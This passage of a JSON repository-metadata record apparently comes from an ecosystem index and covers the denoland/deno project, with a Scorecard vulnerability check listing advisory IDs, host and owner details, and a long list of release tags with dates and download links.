Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v